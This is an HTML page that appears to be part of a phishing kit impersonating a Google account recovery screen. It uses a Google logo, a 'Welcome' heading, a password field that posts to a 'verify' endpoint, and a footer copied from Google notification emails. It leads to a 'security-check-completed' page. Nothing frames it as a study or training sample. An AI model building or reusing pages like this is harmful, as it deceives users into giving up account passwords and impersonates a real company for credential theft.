<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Recover Your account</title>
    <link rel="stylesheet" href="css/styles.css">
  </head>
  <body>



<div class="important-form">
    <img class="ryaim" src="imagesgmail/google1.png" alt="">
    <h1 style="color: rgb(95, 83, 83); text-align: center; margin: 0; font-weight: 100;">Welcome</h1>

    <div class="recovery-form-amend" >
       <form class="verify-form"  action="verify" method="post">
     
        <div class="verify-email-imput">
            <p>Enter new password</p>
          <input  class="text-input" type="password" name="newPassword" placeholder="Enter new password" required autofocus>
        </div> 

        
       <div style="">
          <!-- <a href="security-check-completed">Submit</a> -->
                    <a type="submit" name="submit" href="security-check-completed">Submit</a>

        </div>

    
      </form>

     </div>  
</div>
<div class="copyright">
  <p>You received this email to let you know about important changes to your Google Account and services.
    © 2020 Google LLC, 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</p>
</div>
</div>



  </body>
</html>
